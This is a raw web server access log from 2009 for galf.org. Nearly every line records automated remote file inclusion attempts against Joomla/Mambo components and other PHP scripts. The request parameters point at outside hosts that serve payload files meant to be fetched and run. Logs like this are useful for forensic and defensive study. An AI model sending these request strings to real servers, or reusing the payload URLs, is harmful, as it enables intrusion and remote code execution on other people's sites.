209.172.33.230 - - [06/Sep/2009:23:31:45 -0700] "GET /logs/access_090413.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:31:45 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:31:45 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
208.64.216.6 - - [06/Sep/2009:23:36:17 -0700] "GET /logs//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [06/Sep/2009:23:36:17 -0700] "GET /components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [06/Sep/2009:23:36:23 -0700] "GET /logs/access_090119.log%20%20//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:23:39:55 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:23:39:55 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:23:39:55 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:40:04 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:40:04 -0700] "GET /logs/access_090413.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:40:04 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
125.141.196.8 - - [06/Sep/2009:23:40:57 -0700] "GET /logs/access.log%20%20//write.php?dir=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [06/Sep/2009:23:40:57 -0700] "GET /logs//write.php?dir=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [06/Sep/2009:23:40:57 -0700] "GET /write.php?dir=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:23:41:04 -0700] "GET /logs/access.log%20%20//skin/zero_vote/setup.php?dir=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:45:43 -0700] "GET /logs//viewbody.html?code=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:45:43 -0700] "GET /viewbody.html?code=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:45:43 -0700] "GET /logs/access_090406.log//viewbody.html?code=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
121.254.195.7 - - [06/Sep/2009:23:46:03 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:46:10 -0700] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:46:10 -0700] "GET /?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:46:10 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:46:10 -0700] "GET /logs/access_090413.log//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:24 -0700] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:24 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:24 -0700] "GET /logs/access.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:49 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:50 -0700] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:50 -0700] "GET /logs/access.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.38.188.164 - - [06/Sep/2009:23:46:52 -0700] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:46:52 -0700] "GET /?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:46:52 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:46:53 -0700] "GET /logs/access_090413.log//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:53 -0700] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:53 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [06/Sep/2009:23:46:53 -0700] "GET /logs/access.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.38.188.164 - - [06/Sep/2009:23:47:58 -0700] "GET /logs/access_090525.log%20%20//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:48:03 -0700] "GET /logs/access_090413.log%20%20//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:48:12 -0700] "GET /logs/access_090525.log%20%20//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:23:48:12 -0700] "GET /logs/access_090413.log%20%20//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [06/Sep/2009:23:48:16 -0700] "GET /logs/access.log//write.php?dir=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [06/Sep/2009:23:48:16 -0700] "GET /write.php?dir=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [06/Sep/2009:23:48:19 -0700] "GET /logs//write.php?dir=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:23:48:56 -0700] "GET /logs//main.php?sayfa=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:23:48:56 -0700] "GET /main.php?sayfa=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:23:48:56 -0700] "GET /logs/access_090831.log%20//main.php?sayfa=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:49:00 -0700] "GET /logs/access.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [06/Sep/2009:23:50:12 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [06/Sep/2009:23:50:12 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [06/Sep/2009:23:50:12 -0700] "GET /components/com_flyspray/startdown.php?file=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
205.134.252.26 - - [06/Sep/2009:23:51:04 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://pampa.hu/media/media_pampa/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [06/Sep/2009:23:51:04 -0700] "GET /logs/access_090223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://pampa.hu/media/media_pampa/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [06/Sep/2009:23:51:07 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://pampa.hu/media/media_pampa/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [06/Sep/2009:23:51:22 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://pampa.hu/media/media_pampa/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [06/Sep/2009:23:51:22 -0700] "GET /logs/access_090223.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://pampa.hu/media/media_pampa/one? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [06/Sep/2009:23:51:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://pampa.hu/media/media_pampa/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:23:51:48 -0700] "GET /logs/access_090608.log//main.php?sayfa=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:23:53:48 -0700] "GET /logs/access_090223.log//classes/adodbt/sql.php?classes_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:23:53:48 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:55:07 -0700] "GET /logs/access.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [06/Sep/2009:23:55:07 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:55:07 -0700] "GET /logs/access_090525.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:55:10 -0700] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:55:16 -0700] "GET /logs/access.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [06/Sep/2009:23:55:23 -0700] "GET /index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:55:23 -0700] "GET /logs/access_090406.log%20%20/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:55:23 -0700] "GET /logs/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:55:30 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:55:30 -0700] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [06/Sep/2009:23:55:30 -0700] "GET /logs/access_090525.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:23:55:37 -0700] "GET /logs/access.log//main.php?sayfa=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.134.252.26 - - [06/Sep/2009:23:56:00 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://pampa.hu/media/media_pampa/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:56:17 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:56:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:56:17 -0700] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:56:23 -0700] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:23:56:31 -0700] "GET /logs/access_090316.log//classes/adodbt/sql.php?classes_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:56:31 -0700] "GET /logs/access_090622.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:56:31 -0700] "GET /logs/access_090518.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:56:31 -0700] "GET /logs/access_090831.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:56:31 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:56:37 -0700] "GET /logs/access_090803.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [06/Sep/2009:23:57:59 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:00:21 -0700] "GET /logs/access_090504.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:00:21 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:00:21 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:00:26 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:00:26 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:00:26 -0700] "GET /logs/access_090504.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [07/Sep/2009:00:05:14 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [07/Sep/2009:00:06:34 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [07/Sep/2009:00:06:34 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [07/Sep/2009:00:06:35 -0700] "GET /logs/access_090202.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:07 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:07 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:07 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:10 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:10 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:10 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:11 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:12:11 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:12:11 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:12:11 -0700] "GET /logs/access_090309.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:12:12 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:12:12 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:12:12 -0700] "GET /logs/access_090309.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:15 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.254.195.7 - - [07/Sep/2009:00:12:15 -0700] "GET /logs/access_090420.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.254.195.7 - - [07/Sep/2009:00:12:16 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.254.195.7 - - [07/Sep/2009:00:12:16 -0700] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:26 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:26 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:39 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:12:39 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:10 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:10 -0700] "GET /logs/access_090622.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
